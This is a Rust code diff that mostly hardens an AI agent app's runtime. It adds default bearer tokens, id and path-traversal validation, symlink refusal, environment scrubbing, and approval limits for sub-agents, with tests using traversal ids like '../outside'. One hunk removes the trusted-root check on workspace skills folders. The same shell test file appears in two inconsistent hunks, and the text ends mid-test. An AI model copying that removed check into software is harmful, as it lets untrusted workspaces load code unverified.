 impl Default for RuntimeApiOptions {
@@ -86,8 +88,53 @@ impl Default for RuntimeApiOptions {
             workers: 2,
             cors_origins: Vec::new(),
             auth_token: None,
+            insecure_no_auth: false,
         }
     }
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+struct ResolvedRuntimeAuth {
+    token: Option<String>,
+    generated: bool,
+}
+
+fn resolve_runtime_auth(
+    cli_token: Option<String>,
+    env_token: Option<String>,
+    insecure_no_auth: bool,
+) -> ResolvedRuntimeAuth {
+    if let Some(token) = first_nonblank_token(cli_token).or_else(|| first_nonblank_token(env_token))
+    {
+        return ResolvedRuntimeAuth {
+            token: Some(token),
+            generated: false,
+        };
+    }
+    if insecure_no_auth {
+        return ResolvedRuntimeAuth {
+            token: None,
+            generated: false,
+        };
+    }
+    ResolvedRuntimeAuth {
+        token: Some(generate_runtime_token()),
+        generated: true,
+    }
+}
+
+fn first_nonblank_token(token: Option<String>) -> Option<String> {
+    token
+        .map(|token| token.trim().to_string())
+        .filter(|token| !token.is_empty())
+}
+
+fn generate_runtime_token() -> String {
+    format!(
+        "dst_{}{}",
+        uuid::Uuid::new_v4().simple(),
+        uuid::Uuid::new_v4().simple()
+    )
 }
 
 #[derive(Debug, Deserialize)]
@@ -348,11 +395,12 @@ pub async fn run_http_server(
             .map(|h| h.join(".deepseek").join("sessions"))
             .unwrap_or_else(|| PathBuf::from(".deepseek").join("sessions"))
     });
-    let runtime_token = options
-        .auth_token
-        .clone()
-        .or_else(|| std::env::var("DEEPSEEK_RUNTIME_TOKEN").ok())
-        .filter(|token| !token.trim().is_empty());
+    let resolved_auth = resolve_runtime_auth(
+        options.auth_token.clone(),
+        std::env::var("DEEPSEEK_RUNTIME_TOKEN").ok(),
+        options.insecure_no_auth,
+    );
+    let runtime_token = resolved_auth.token.clone();
     let auth_enabled = runtime_token.is_some();
     let skill_state = SkillStateStore::load_default().unwrap_or_else(|err| {
         tracing::warn!(
@@ -370,7 +418,7 @@ pub async fn run_http_server(
         sessions_dir,
         mcp_config_path: config.mcp_config_path(),
         automations,
-        runtime_token,
+        runtime_token: runtime_token.clone(),
         skill_state: Arc::new(Mutex::new(skill_state)),
         auth_required: auth_enabled,
         bind_host: options.host.clone(),
@@ -386,6 +434,17 @@ pub async fn run_http_server(
         .with_context(|| format!("Failed to bind {addr}"))?;
 
     println!("Runtime API listening on http://{addr}");
+    if resolved_auth.generated {
+        if let Some(token) = runtime_token.as_deref() {
+            println!("Runtime API auth: generated bearer token for this process.");
+            println!("  Authorization: Bearer {token}");
+            println!("  Set DEEPSEEK_RUNTIME_TOKEN or pass --auth-token for a stable token.");
+        }
+    } else if auth_enabled {
+        println!("Runtime API auth: bearer token required for /v1/* routes.");
+    } else {
+        println!("Runtime API auth: disabled by explicit insecure mode.");
+    }
     let is_loopback = options.host == "127.0.0.1" || options.host == "::1";
     if is_loopback {
         println!("Security: this server is local-first. Do not expose it to untrusted networks.");
@@ -396,7 +455,7 @@ pub async fn run_http_server(
         );
         if !auth_enabled {
             println!(
-                "  WARNING: --auth-token (or DEEPSEEK_RUNTIME_TOKEN) is unset. Anyone on the network can call /v1/* without authentication."
+                "  WARNING: auth is disabled. Anyone on the network can call /v1/* without authentication."
             );
         }
         println!(
@@ -405,9 +464,6 @@ pub async fn run_http_server(
             port = options.port,
             auth = auth_enabled,
         );
-    }
-    if auth_enabled {
-        println!("Runtime API auth: bearer token required for /v1/* routes.");
     }
     let serve_result = axum::serve(listener, app)
         .await
@@ -1836,6 +1892,50 @@ mod tests {
                 error: None,
             }
         }
+    }
+
+    #[test]
+    fn runtime_auth_generates_token_by_default() {
+        let auth = resolve_runtime_auth(None, None, false);
+        assert!(auth.generated);
+        let token = auth.token.expect("generated token");
+        assert!(token.starts_with("dst_"));
+        assert!(token.len() > 32);
+    }
+
+    #[test]
+    fn runtime_auth_requires_explicit_insecure_for_no_token() {
+        let auth = resolve_runtime_auth(None, None, true);
+        assert_eq!(
+            auth,
+            ResolvedRuntimeAuth {
+                token: None,
+                generated: false,
+            }
+        );
+    }
+
+    #[test]
+    fn runtime_auth_prefers_cli_token_over_env_token() {
+        let auth = resolve_runtime_auth(
+            Some(" cli-token ".to_string()),
+            Some("env-token".to_string()),
+            false,
+        );
+        assert_eq!(
+            auth,
+            ResolvedRuntimeAuth {
+                token: Some("cli-token".to_string()),
+                generated: false,
+            }
+        );
+    }
+
+    #[test]
+    fn runtime_auth_ignores_blank_configured_tokens() {
+        let auth = resolve_runtime_auth(Some(" ".to_string()), Some("\t".to_string()), false);
+        assert!(auth.generated);
+        assert!(auth.token.is_some());
     }
 
     async fn spawn_test_server_with_root(

--- a/crates/tui/src/runtime_api.rs
+++ b/crates/tui/src/runtime_api.rs
@@ -1658,30 +1658,18 @@ fn run_git(workspace: &std::path::Path, args: &[&str]) -> Option<String> {
 }
 
 fn resolve_skills_dir(config: &Config, workspace: &std::path::Path) -> PathBuf {
-    let configured_skills_dir = config.skills_dir();
-    let trusted_root = fs::canonicalize(&configured_skills_dir).unwrap_or(configured_skills_dir.clone());
-
-    let workspace = match fs::canonicalize(workspace) {
-        Ok(path) => path,
-        Err(_) => return configured_skills_dir,
-    };
-
-    if !workspace.starts_with(&trusted_root) {
-        return configured_skills_dir;
-    }
-
+    let workspace = fs::canonicalize(workspace).unwrap_or_else(|_| workspace.to_path_buf());
     for candidate in [
         workspace.join(".agents").join("skills"),
         workspace.join("skills"),
     ] {
         if let Ok(candidate) = fs::canonicalize(candidate)
-            && candidate.starts_with(&trusted_root)
             && candidate.is_dir()
         {
             return candidate;
         }
     }
-    configured_skills_dir
+    config.skills_dir()
 }
 
 fn load_mcp_config_or_default(path: &std::path::Path) -> Result<McpConfig, ApiError> {

--- a/crates/tui/src/runtime_threads.rs
+++ b/crates/tui/src/runtime_threads.rs
@@ -33,6 +33,24 @@ use crate::tui::app::AppMode;
 const EVENT_CHANNEL_CAPACITY: usize = 1024;
 const MAX_ACTIVE_THREADS_DEFAULT: usize = 8;
 const SUMMARY_LIMIT: usize = 280;
+
+fn validated_record_id<'a>(id: &'a str, label: &str) -> Result<&'a str> {
+    let trimmed = id.trim();
+    if trimmed.is_empty() {
+        bail!("{label} cannot be empty");
+    }
+    if trimmed != id {
+        bail!("{label} cannot contain leading or trailing whitespace");
+    }
+    if !trimmed
+        .chars()
+        .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
+    {
+        bail!("{label} contains unsupported characters");
+    }
+    Ok(trimmed)
+}
+
 /// Bumped to 2 for v0.6.6 — see issue #124. The persisted thread/turn/item
 /// records didn't change shape, but the live engine semantics did: cycle
 /// boundaries advance the `Session.cycle_count` and produce archived JSONL
@@ -241,36 +259,43 @@ impl RuntimeThreadStore {
         })
     }
 
-    fn thread_path(&self, thread_id: &str) -> PathBuf {
-        self.threads_dir.join(format!("{thread_id}.json"))
+    fn record_path(base: &Path, id: &str, extension: &str, label: &str) -> Result<PathBuf> {
+        let id = validated_record_id(id, label)?;
+        Ok(base.join(format!("{id}.{extension}")))
     }
 
-    fn turn_path(&self, turn_id: &str) -> PathBuf {
-        self.turns_dir.join(format!("{turn_id}.json"))
+    fn thread_path(&self, thread_id: &str) -> Result<PathBuf> {
+        Self::record_path(&self.threads_dir, thread_id, "json", "thread id")
     }
 
-    fn item_path(&self, item_id: &str) -> PathBuf {
-        self.items_dir.join(format!("{item_id}.json"))
+    fn turn_path(&self, turn_id: &str) -> Result<PathBuf> {
+        Self::record_path(&self.turns_dir, turn_id, "json", "turn id")
     }
 
-    fn events_path(&self, thread_id: &str) -> PathBuf {
-        self.events_dir.join(format!("{thread_id}.jsonl"))
+    fn item_path(&self, item_id: &str) -> Result<PathBuf> {
+        Self::record_path(&self.items_dir, item_id, "json", "item id")
+    }
+
+    fn events_path(&self, thread_id: &str) -> Result<PathBuf> {
+        Self::record_path(&self.events_dir, thread_id, "jsonl", "thread id")
     }
 
     pub fn save_thread(&self, thread: &ThreadRecord) -> Result<()> {
-        write_json_atomic(&self.thread_path(&thread.id), thread)
+        write_json_atomic(&self.thread_path(&thread.id)?, thread)
     }
 
     pub fn save_turn(&self, turn: &TurnRecord) -> Result<()> {
-        write_json_atomic(&self.turn_path(&turn.id), turn)
+        validated_record_id(&turn.thread_id, "thread id")?;
+        write_json_atomic(&self.turn_path(&turn.id)?, turn)
     }
 
     pub fn save_item(&self, item: &TurnItemRecord) -> Result<()> {
-        write_json_atomic(&self.item_path(&item.id), item)
+        validated_record_id(&item.turn_id, "turn id")?;
+        write_json_atomic(&self.item_path(&item.id)?, item)
     }
 
     pub fn load_thread(&self, thread_id: &str) -> Result<ThreadRecord> {
-        let path = self.thread_path(thread_id);
+        let path = self.thread_path(thread_id)?;
         let raw = fs::read_to_string(&path)
             .with_context(|| format!("Failed to read thread {}", path.display()))?;
         let record: ThreadRecord = serde_json::from_str(&raw)
@@ -286,7 +311,7 @@ impl RuntimeThreadStore {
     }
 
     pub fn load_turn(&self, turn_id: &str) -> Result<TurnRecord> {
-        let path = self.turn_path(turn_id);
+        let path = self.turn_path(turn_id)?;
         let raw = fs::read_to_string(&path)
             .with_context(|| format!("Failed to read turn {}", path.display()))?;
         let record: TurnRecord = serde_json::from_str(&raw)
@@ -302,7 +327,7 @@ impl RuntimeThreadStore {
     }
 
     pub fn load_item(&self, item_id: &str) -> Result<TurnItemRecord> {
-        let path = self.item_path(item_id);
+        let path = self.item_path(item_id)?;
         let raw = fs::read_to_string(&path)
             .with_context(|| format!("Failed to read item {}", path.display()))?;
         let record: TurnItemRecord = serde_json::from_str(&raw)
@@ -345,6 +370,7 @@ impl RuntimeThreadStore {
     }
 
     pub fn list_turns_for_thread(&self, thread_id: &str) -> Result<Vec<TurnRecord>> {
+        validated_record_id(thread_id, "thread id")?;
         let mut out = Vec::new();
         for entry in fs::read_dir(&self.turns_dir)
             .with_context(|| format!("Failed to read {}", self.turns_dir.display()))?
@@ -374,6 +400,7 @@ impl RuntimeThreadStore {
     }
 
     pub fn list_items_for_turn(&self, turn_id: &str) -> Result<Vec<TurnItemRecord>> {
+        validated_record_id(turn_id, "turn id")?;
         let mut out = Vec::new();
         for entry in fs::read_dir(&self.items_dir)
             .with_context(|| format!("Failed to read {}", self.items_dir.display()))?
@@ -414,6 +441,15 @@ impl RuntimeThreadStore {
         event: impl Into<String>,
         payload: Value,
     ) -> Result<RuntimeEventRecord> {
+        validated_record_id(thread_id, "thread id")?;
+        if let Some(turn_id) = turn_id {
+            validated_record_id(turn_id, "turn id")?;
+        }
+        if let Some(item_id) = item_id {
+            validated_record_id(item_id, "item id")?;
+        }
+        let path = self.events_path(thread_id)?;
+
         let mut state = self.state.lock().await;
         let seq = state.next_seq;
         state.next_seq = state.next_seq.saturating_add(1);
@@ -431,7 +467,6 @@ impl RuntimeThreadStore {
             payload,
         };
 
-        let path = self.events_path(thread_id);
         let mut file = OpenOptions::new()
             .create(true)
             .append(true)
@@ -451,7 +486,7 @@ impl RuntimeThreadStore {
         thread_id: &str,
         since_seq: Option<u64>,
     ) -> Result<Vec<RuntimeEventRecord>> {
-        let path = self.events_path(thread_id);
+        let path = self.events_path(thread_id)?;
         if !path.exists() {
             return Ok(Vec::new());
         }
@@ -3317,6 +3352,37 @@ mod tests {
         // Locks the bump in (issue #124). Bump deliberately when persisted
         // shape changes.
         assert_eq!(CURRENT_RUNTIME_SCHEMA_VERSION, 2);
+    }
+
+    #[test]
+    fn store_rejects_path_like_record_ids() {
+        let dir = test_runtime_dir();
+        let store = RuntimeThreadStore::open(dir.clone()).expect("open store");
+
+        let err = store
+            .load_thread("../outside")
+            .expect_err("path traversal id should fail");
+        assert!(
+            format!("{err:#}").contains("unsupported characters"),
+            "got: {err:#}"
+        );
+
+        let mut thread = sample_thread("thr_bad/id");
+        let err = store
+            .save_thread(&thread)
+            .expect_err("path separator id should fail");
+        assert!(
+            format!("{err:#}").contains("unsupported characters"),
+            "got: {err:#}"
+        );
+
+        thread.id = " thr_bad".to_string();
+        let err = store
+            .save_thread(&thread)
+            .expect_err("whitespace id should fail");
+        assert!(format!("{err:#}").contains("whitespace"), "got: {err:#}");
+
+        let _ = std::fs::remove_dir_all(dir);
     }
 
     #[test]

--- a/crates/tui/src/session_manager.rs
+++ b/crates/tui/src/session_manager.rs
@@ -12,7 +12,7 @@ use crate::utils::write_atomic;
 use chrono::{DateTime, Utc};
 use serde::{Deserialize, Serialize};
 use std::fs;
-use std::path::{Path, PathBuf};
+use std::path::{Component, Path, PathBuf};
 use uuid::Uuid;
 
 /// Maximum number of sessions to retain
@@ -31,6 +31,31 @@ const fn default_session_schema_version() -> u32 {
 
 const fn default_queue_schema_version() -> u32 {
     CURRENT_QUEUE_SCHEMA_VERSION
+}
+
+fn normalize_managed_dir(path: PathBuf) -> std::io::Result<PathBuf> {
+    if path.as_os_str().is_empty() {
+        return Err(std::io::Error::new(
+            std::io::ErrorKind::InvalidInput,
+            "managed directory path cannot be empty",
+        ));
+    }
+    if path.components().any(|component| {
+        matches!(
+            component,
+            Component::ParentDir | Component::Prefix(_) | Component::RootDir
+        )
+    }) && path.is_relative()
+    {
+        return Err(std::io::Error::new(
+            std::io::ErrorKind::InvalidInput,
+            "managed directory path cannot contain traversal components",
+        ));
+    }
+    if path.is_absolute() {
+        return Ok(path);
+    }
+    std::env::current_dir().map(|cwd| cwd.join(path))
 }
 
 /// Persisted queued message for offline/degraded mode.
@@ -117,6 +142,7 @@ pub struct SavedSession {
 }
 
 /// Manager for session persistence operations
+#[derive(Debug)]
 pub struct SessionManager {
     /// Directory where sessions are stored
     sessions_dir: PathBuf,
@@ -145,6 +171,7 @@ impl SessionManager {
 
     /// Create a new `SessionManager` with the specified sessions directory
     pub fn new(sessions_dir: PathBuf) -> std::io::Result<Self> {
+        let sessions_dir = normalize_managed_dir(sessions_dir)?;
         // Ensure the sessions directory exists
         fs::create_dir_all(&sessions_dir)?;
         Ok(Self { sessions_dir })
@@ -1061,6 +1088,13 @@ mod tests {
     }
 
     #[test]
+    fn test_session_manager_rejects_relative_traversal_dir() {
+        let err = SessionManager::new(PathBuf::from("../sessions"))
+            .expect_err("relative traversal directory should fail");
+        assert_eq!(err.kind(), std::io::ErrorKind::InvalidInput);
+    }
+
+    #[test]
     fn test_truncate_title() {
         assert_eq!(truncate_title("Short", 50), "Short");
         assert_eq!(
@@ -1234,8 +1268,7 @@ mod tests {
             .expect("present");
         assert!(
             unscoped.session_id.is_none(),
-            "save with None must persist a missing session_id, got {:?}",
-            unscoped.session_id
+            "save with None must persist a missing session_id"
         );
     }
 

--- a/crates/tui/src/skills/mod.rs
+++ b/crates/tui/src/skills/mod.rs
@@ -103,7 +103,10 @@ impl SkillRegistry {
     #[must_use]
     pub fn discover(dir: &Path) -> Self {
         let mut registry = Self::default();
-        if !dir.exists() {
+        let Ok(canonical_dir) = fs::canonicalize(dir) else {
+            return registry;
+        };
+        if !canonical_dir.is_dir() {
             return registry;
         }
 
@@ -403,8 +406,12 @@ pub fn skills_directories(workspace: &Path) -> Vec<PathBuf> {
 
 fn existing_skill_dirs(candidates: impl IntoIterator<Item = PathBuf>) -> Vec<PathBuf> {
     let mut out = Vec::new();
+    let mut seen = HashSet::new();
     for path in candidates {
-        if path.is_dir() && !out.iter().any(|p: &PathBuf| p == &path) {
+        let Ok(canonical_path) = fs::canonicalize(&path) else {
+            continue;
+        };
+        if canonical_path.is_dir() && seen.insert(canonical_path) {
             out.push(path);
         }
     }

--- a/crates/tui/src/tools/file_search.rs
+++ b/crates/tui/src/tools/file_search.rs
@@ -124,7 +124,7 @@ fn search_files(
     let mut results: Vec<FileSearchMatch> = Vec::new();
 
     let mut builder = WalkBuilder::new(base_path);
-    builder.hidden(false).follow_links(true).require_git(false);
+    builder.hidden(false).follow_links(false).require_git(false);
     let walker = builder.build();
 
     for entry in walker {
@@ -321,5 +321,28 @@ mod tests {
         assert!(result.success);
         assert!(result.content.contains("main.rs"));
         assert!(!result.content.contains("notes.md"));
+    }
+
+    #[tokio::test]
+    #[cfg(unix)]
+    async fn test_file_search_does_not_follow_symlinked_files() {
+        let tmp = tempdir().expect("tempdir");
+        let root = tmp.path().join("workspace");
+        let outside = tmp.path().join("outside");
+        std::fs::create_dir_all(&root).expect("mkdir workspace");
+        std::fs::create_dir_all(&outside).expect("mkdir outside");
+        let outside_file = outside.join("secret.txt");
+        std::fs::write(&outside_file, "outside\n").expect("write outside");
+        std::os::unix::fs::symlink(&outside_file, root.join("secret.txt")).expect("symlink");
+
+        let ctx = ToolContext::new(root);
+        let tool = FileSearchTool;
+        let result = tool
+            .execute(json!({"query": "secret"}), &ctx)
+            .await
+            .expect("execute");
+
+        assert!(result.success);
+        assert!(!result.content.contains("secret.txt"));
     }
 }

--- a/crates/tui/src/tools/project.rs
+++ b/crates/tui/src/tools/project.rs
@@ -63,10 +63,13 @@ fn generate_project_map(root: &std::path::Path, max_depth: usize) -> Result<Proj
     // For key_files, we can just do a quick scan since summarize_project doesn't return them directly anymore
     let mut key_files = Vec::new();
     let mut builder = ignore::WalkBuilder::new(root);
-    builder.hidden(false).follow_links(true).max_depth(Some(2));
+    builder.hidden(false).follow_links(false).max_depth(Some(2));
     let walker = builder.build();
 
     for entry in walker.flatten() {
+        if entry.file_type().is_some_and(|ft| ft.is_symlink()) {
+            continue;
+        }
         if is_key_file(entry.path())
             && let Ok(rel) = entry.path().strip_prefix(root)
         {

--- a/crates/tui/src/tools/registry.rs
+++ b/crates/tui/src/tools/registry.rs
@@ -554,6 +554,25 @@ impl ToolRegistryBuilder {
             .with_tool(Arc::new(GithubCloseIssueTool))
     }
 
+    /// Include only read-only durable task, PR-attempt, GitHub, and automation
+    /// inspection tools. Plan mode uses this surface so it can observe state
+    /// without starting work, changing remotes, or mutating automation config.
+    #[must_use]
+    pub fn with_runtime_read_only_task_tools(self) -> Self {
+        use super::automation::{AutomationListTool, AutomationReadTool};
+        use super::github::{GithubIssueContextTool, GithubPrContextTool};
+        use super::tasks::{PrAttemptListTool, PrAttemptReadTool, TaskListTool, TaskReadTool};
+
+        self.with_tool(Arc::new(TaskListTool))
+            .with_tool(Arc::new(TaskReadTool))
+            .with_tool(Arc::new(GithubIssueContextTool))
+            .with_tool(Arc::new(GithubPrContextTool))
+            .with_tool(Arc::new(PrAttemptListTool))
+            .with_tool(Arc::new(PrAttemptReadTool))
+            .with_tool(Arc::new(AutomationListTool))
+            .with_tool(Arc::new(AutomationReadTool))
+    }
+
     /// Include web search tools.
     #[must_use]
     pub fn with_web_tools(self) -> Self {

--- a/crates/tui/src/tools/search.rs
+++ b/crates/tui/src/tools/search.rs
@@ -260,6 +260,16 @@ fn collect_files_recursive(
     for entry in entries {
         let entry = entry.map_err(|e| ToolError::execution_failed(e.to_string()))?;
         let path = entry.path();
+        let file_type = entry.file_type().map_err(|e| {
+            ToolError::execution_failed(format!(
+                "Failed to inspect file type for {}: {}",
+                path.display(),
+                e
+            ))
+        })?;
+        if file_type.is_symlink() {
+            continue;
+        }
 
         // Get relative path for pattern matching
         let relative = path.strip_prefix(root).unwrap_or(&path);
@@ -270,9 +280,9 @@ fn collect_files_recursive(
             continue;
         }
 
-        if path.is_dir() {
+        if file_type.is_dir() {
             collect_files_recursive(root, &path, include_patterns, exclude_patterns, files)?;
-        } else if path.is_file() {
+        } else if file_type.is_file() {
             // Check inclusions (if any specified)
             if include_patterns.is_empty() || should_include(&relative_str, include_patterns) {
                 files.push(path);
@@ -542,6 +552,31 @@ mod tests {
                 .next()
                 .is_some_and(|ext| ext.eq_ignore_ascii_case("rs"))
         );
+    }
+
+    #[tokio::test]
+    #[cfg(unix)]
+    async fn test_grep_files_does_not_follow_symlinked_files() {
+        let tmp = tempdir().expect("tempdir");
+        let root = tmp.path().join("workspace");
+        let outside = tmp.path().join("outside");
+        std::fs::create_dir_all(&root).expect("mkdir workspace");
+        std::fs::create_dir_all(&outside).expect("mkdir outside");
+        let outside_file = outside.join("secret.txt");
+        fs::write(&outside_file, "NEEDLE\n").expect("write outside");
+        std::os::unix::fs::symlink(&outside_file, root.join("secret.txt")).expect("symlink");
+
+        let ctx = ToolContext::new(root);
+        let tool = GrepFilesTool;
+        let result = tool
+            .execute(json!({"pattern": "NEEDLE"}), &ctx)
+            .await
+            .expect("execute");
+
+        assert!(result.success);
+        let parsed: Value = serde_json::from_str(&result.content).unwrap();
+        assert_eq!(parsed["total_matches"].as_u64().unwrap(), 0);
+        assert_eq!(parsed["files_searched"].as_u64().unwrap(), 0);
     }
 
     #[tokio::test]

--- a/crates/tui/src/tools/shell.rs
+++ b/crates/tui/src/tools/shell.rs
@@ -25,6 +25,7 @@ use std::os::unix::process::CommandExt;
 use portable_pty::{CommandBuilder, PtySize, native_pty_system};
 
 use super::shell_output::{summarize_output, truncate_with_meta};
+use crate::child_env;
 use crate::sandbox::{
     CommandSpec,
     ExecEnv,
@@ -765,10 +766,7 @@ impl ShellManager {
             cmd.stdin(Stdio::piped());
         }
 
-        // Set environment variables from exec_env
-        for (key, value) in &exec_env.env {
-            cmd.env(key, value);
-        }
+        child_env::apply_to_command(&mut cmd, child_env::string_map_env(&exec_env.env));
 
         let mut child = cmd
             .spawn()
@@ -904,9 +902,7 @@ impl ShellManager {
         }
         install_parent_death_signal(&mut cmd);
 
-        for (key, value) in &exec_env.env {
-            cmd.env(key, value);
-        }
+        child_env::apply_to_command(&mut cmd, child_env::string_map_env(&exec_env.env));
 
         let mut child = cmd
             .spawn()
@@ -1010,9 +1006,7 @@ impl ShellManager {
                 cmd.arg(arg);
             }
             cmd.cwd(working_dir);
-            for (key, value) in &exec_env.env {
-                cmd.env(key, value);
-            }
+            child_env::apply_to_pty_command(&mut cmd, child_env::string_map_env(&exec_env.env));
 
             let child = pair
                 .slave
@@ -1048,9 +1042,7 @@ impl ShellManager {
                 cmd.process_group(0);
             }
 
-            for (key, value) in &exec_env.env {
-                cmd.env(key, value);
-            }
+            child_env::apply_to_command(&mut cmd, child_env::string_map_env(&exec_env.env));
 
             let mut child = cmd
                 .spawn()

--- a/crates/tui/src/tools/shell/tests.rs
+++ b/crates/tui/src/tools/shell/tests.rs
@@ -2,9 +2,15 @@ use super::*;
 
 use crate::tools::spec::ToolContext;
 use serde_json::{Value, json};
-use std::sync::{Mutex, OnceLock};
 use tempfile::tempdir;
 
+// `env_lock` exists only to serialize Unix-only env-mutating tests.
+// Windows builds gate that test out, so the helper would be dead code
+// under `-Dwarnings` if the import + helper were unconditional.
+#[cfg(unix)]
+use std::sync::{Mutex, OnceLock};
+
+#[cfg(unix)]
 fn env_lock() -> &'static Mutex<()> {
     static LOCK: OnceLock<Mutex<()>> = OnceLock::new();
     LOCK.get_or_init(|| Mutex::new(()))

--- a/crates/tui/src/tools/shell/tests.rs
+++ b/crates/tui/src/tools/shell/tests.rs
@@ -2,7 +2,13 @@ use super::*;
 
 use crate::tools::spec::ToolContext;
 use serde_json::{Value, json};
+use std::sync::{Mutex, OnceLock};
 use tempfile::tempdir;
+
+fn env_lock() -> &'static Mutex<()> {
+    static LOCK: OnceLock<Mutex<()>> = OnceLock::new();
+    LOCK.get_or_init(|| Mutex::new(()))
+}
 
 fn echo_command(message: &str) -> String {
     format!("echo {message}")
@@ -80,6 +86,49 @@ fn failed_network_shell_result(stdout: &str, stderr: &str) -> ShellResult {
         sandbox_type: Some("seatbelt".to_string()),
         sandbox_denied: false,
     }
+}
+
+#[test]
+#[cfg(unix)]
+fn shell_execution_scrubs_parent_env_and_keeps_explicit_env() {
+    let _guard = env_lock().lock().expect("env lock");
+    let previous = std::env::var_os("DEEPSEEK_CHILD_ENV_SHELL_SECRET");
+    unsafe {
+        std::env::set_var("DEEPSEEK_CHILD_ENV_SHELL_SECRET", "parent-secret");
+    }
+
+    let tmp = tempdir().expect("tempdir");
+    let mut manager = ShellManager::new(tmp.path().to_path_buf());
+    let mut extra = std::collections::HashMap::new();
+    extra.insert(
+        "DEEPSEEK_CHILD_ENV_EXPLICIT".to_string(),
+        "explicit-value".to_string(),
+    );
+
+    let result = manager
+        .execute_with_options_env(
+            "printf '%s\\n%s\\n' \"${DEEPSEEK_CHILD_ENV_SHELL_SECRET-unset}\" \"${DEEPSEEK_CHILD_ENV_EXPLICIT-unset}\"",
+            None,
+            5000,
+            false,
+            None,
+            false,
+            None,
+            extra,
+        )
+        .expect("execute");
+
+    match previous {
+        Some(value) => unsafe {
+            std::env::set_var("DEEPSEEK_CHILD_ENV_SHELL_SECRET", value);
+        },
+        None => unsafe {
+            std::env::remove_var("DEEPSEEK_CHILD_ENV_SHELL_SECRET");
+        },
+    }
+
+    assert_eq!(result.status, ShellStatus::Completed);
+    assert_eq!(result.stdout, "unset\nexplicit-value\n");
 }
 
 #[test]

--- a/crates/tui/src/tools/subagent/mod.rs
+++ b/crates/tui/src/tools/subagent/mod.rs
@@ -747,18 +747,17 @@ impl SubAgentRuntime {
     }
 
     /// Build a child runtime cloning this one, incrementing `spawn_depth`,
-    /// deriving a child cancellation token, and forcing `auto_approve` on
-    /// the child's `ToolContext`. Used at spawn entry to construct the
-    /// runtime the new sub-agent will see.
+    /// and deriving a child cancellation token. Used at spawn entry to
+    /// construct the runtime the new sub-agent will see.
     ///
-    /// The `auto_approve` override is deliberate: spawning IS the approval.
-    /// Per-tool prompts inside a child would break delegation, so children
-    /// inherit a YOLO-equivalent context regardless of the parent's mode.
-    /// The workspace boundary + sandbox profile still apply.
+    /// Children inherit the parent's approval state. A non-auto parent can
+    /// still delegate read-only investigation, but approval-gated child tools
+    /// are blocked by the sub-agent registry instead of being silently run
+    /// without a prompt.
     #[must_use]
     pub fn child_runtime(&self) -> Self {
         let mut child_context = self.context.clone();
-        child_context.auto_approve = true;
+        child_context.auto_approve = self.context.auto_approve;
         Self {
             client: self.client.clone(),
             model: self.model.clone(),
@@ -798,7 +797,8 @@ pub struct SubAgent {
     pub result: Option<String>,
     pub steps_taken: u32,
     pub started_at: Instant,
-    /// `None` = full registry inheritance (v0.6.6 default).
+    /// `None` = full registry inheritance, with approval-gated tools still
+    /// blocked unless the parent runtime is auto-approved.
     /// `Some(list)` = explicit narrow allowlist (Custom agents, legacy).
     pub allowed_tools: Option<Vec<String>>,
     /// Stable id of the manager that spawned this agent (#405). Compared
@@ -1634,7 +1634,7 @@ impl ToolSpec for AgentSpawnTool {
                 "allowed_tools": {
                     "type": "array",
                     "items": { "type": "string" },
-                    "description": "Explicit tool allowlist (required for custom type). Default behavior is full registry inheritance from the parent."
+                    "description": "Explicit tool allowlist (required for custom type). Default behavior is full registry inheritance from the parent; approval-gated tools still require an auto-approved parent."
                 },
                 "model": {
                     "type": "string",
@@ -1712,9 +1712,9 @@ impl ToolSpec for AgentSpawnTool {
         };
 
         // Derive the child's runtime as a durable background job: it keeps
-        // its own cancellation token, forces auto_approve, and optionally
-        // overrides cwd if the caller passed one (used for the parallel-
-        // worktree pattern).
+        // its own cancellation token, inherits the parent approval state, and
+        // optionally overrides cwd if the caller passed one (used for the
+        // parallel-worktree pattern).
         let mut child_runtime = self.runtime.background_runtime();
         if let Some(cwd) = validated_cwd {
             child_runtime.context.workspace = cwd;
@@ -2705,6 +2705,7 @@ struct SubAgentTask {
     prompt: String,
     assignment: SubAgentAssignment,
     /// `None` = full registry inheritance. `Some(list)` = explicit narrow.
+    /// Approval-gated tools still require an auto-approved parent runtime.
     allowed_tools: Option<Vec<String>>,
     fork_context: bool,
     started_at: Instant,
@@ -3775,14 +3776,16 @@ fn emit_agent_progress(
 /// Two modes:
 /// - **Full inheritance** (`allowed_tools = None`): the child sees the same
 ///   tool surface as the parent's Agent mode — every tool family including
-///   `with_subagent_tools` (so it can recurse). This is the v0.6.6 default.
+///   `with_subagent_tools` (so it can recurse). Approval-gated tools are
+///   callable only when the parent runtime is auto-approved.
 /// - **Explicit narrow** (`allowed_tools = Some(list)`): legacy / Custom
 ///   path. The registry still builds the full surface, but only the listed
 ///   tool names are visible to the model and callable.
 struct SubAgentToolRegistry {
-    /// `None` → full inheritance (no filter applied). `Some(list)` →
+    /// `None` → full inheritance (no allowlist filter applied). `Some(list)` →
     /// only the listed tools are visible to the model and callable.
     allowed_tools: Option<Vec<String>>,
+    auto_approve: bool,
     registry: ToolRegistry,
 }
 
@@ -3812,6 +3815,7 @@ impl SubAgentToolRegistry {
 
         Self {
             allowed_tools: explicit_allowed_tools,
+            auto_approve: runtime.context.auto_approve,
             registry,
         }
     }
@@ -3850,6 +3854,16 @@ impl SubAgentToolRegistry {
     async fn execute(&self, _agent_id: &str, name: &str, input: Value) -> Result<String> {
         if !self.is_tool_allowed(name) {
             return Err(anyhow!("Tool {name} not allowed for this sub-agent"));
+        }
+        if !self.auto_approve {
+            let Some(spec) = self.registry.get(name) else {
+                return Err(anyhow!("Tool {name} is not registered"));
+            };
+            if spec.approval_requirement() != ApprovalRequirement::Auto {
+                return Err(anyhow!(
+                    "Tool {name} requires approval and cannot run inside this sub-agent unless the parent session is auto-approved"
+                ));
+            }
         }
         reject_subagent_terminal_takeover(name, &input)?;
         self.registry
@@ -3914,10 +3928,10 @@ fn build_allowed_tools(
         ));
     }
 
-    // Default: full registry inheritance from the parent. The child sees
-    // every tool the parent has, including the sub-agent management family
-    // (so it can recurse). Sandbox + workspace + depth cap remain the
-    // safety net.
+    // Default: full registry inheritance from the parent. The child sees every
+    // tool the parent has, including the sub-agent management family. The
+    // registry execution guard still blocks approval-gated tools unless the
+    // parent runtime is auto-approved.
     Ok(None)
 }
 

--- a/crates/tui/src/tools/subagent/tests.rs
+++ b/crates/tui/src/tools/subagent/tests.rs
@@ -1066,18 +1066,46 @@ fn would_exceed_depth_at_boundary() {
 }
 
 #[test]
-fn child_runtime_increments_depth_and_forces_auto_approve() {
